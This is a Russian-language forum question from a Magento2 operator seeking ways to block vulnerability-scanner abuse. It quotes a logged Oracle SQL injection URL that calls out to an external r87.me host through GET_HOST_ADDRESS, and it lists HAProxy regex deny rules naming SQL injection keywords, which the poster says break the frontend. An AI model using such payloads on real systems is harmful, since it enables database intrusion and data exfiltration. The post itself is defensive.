Расширенное обнаружение злоупотреблений - PullRequest
1 голос
/ 19 марта 2019

мы сталкиваемся с некоторыми сканированиями netsparker и другими проблемами, связанными со злоупотреблениями в установке Magento2.Мы уже реализовали ограничение скорости с помощью липких таблиц.

На следующем шаге мы хотим отказать в определенных URL.

Пример

https://www.exampledomain.com/category/page.html?hTTp%3A%2F%2Fr87_com%2Fn=&attribute=(select%20UTL_INADDR.GET_HOST_ADDRESS(%27i-bwzqt8sjg7sqtf9ygenxljxxmu2ad0itrghi_9%27%7c%7c%27k34.r87.me%27)%20from%20DUAL)

Мы попытались настроить некоторые регулярные выражения, такие как

frontend https

bind *:443 ssl crt... 

    #SQL injection prevention
    #acl URI_DENY url_reg -i .*(WAITFOR|WHERE|DELAY|DECLARE|SLEEP|NSFTW|DUAL)
    #acl URI_DENY url_reg -i .*(SELECT)
    #acl URI_DENY url_reg -i .*(convert|exec|bexec|procedure|dblink|r87.com|xp_dirtree|pg_sleep|dbms_pipe)
    #acl URI_DENY url_reg -i .*(CTXSYS.DRITHSX.SN|GET_HOST_ADDRESS)
    #http-request tarpit if URI_DENY

, которые приводят к ошибкам внешнего интерфейса приложения.

Как мы можем обработать это более эффективно?

...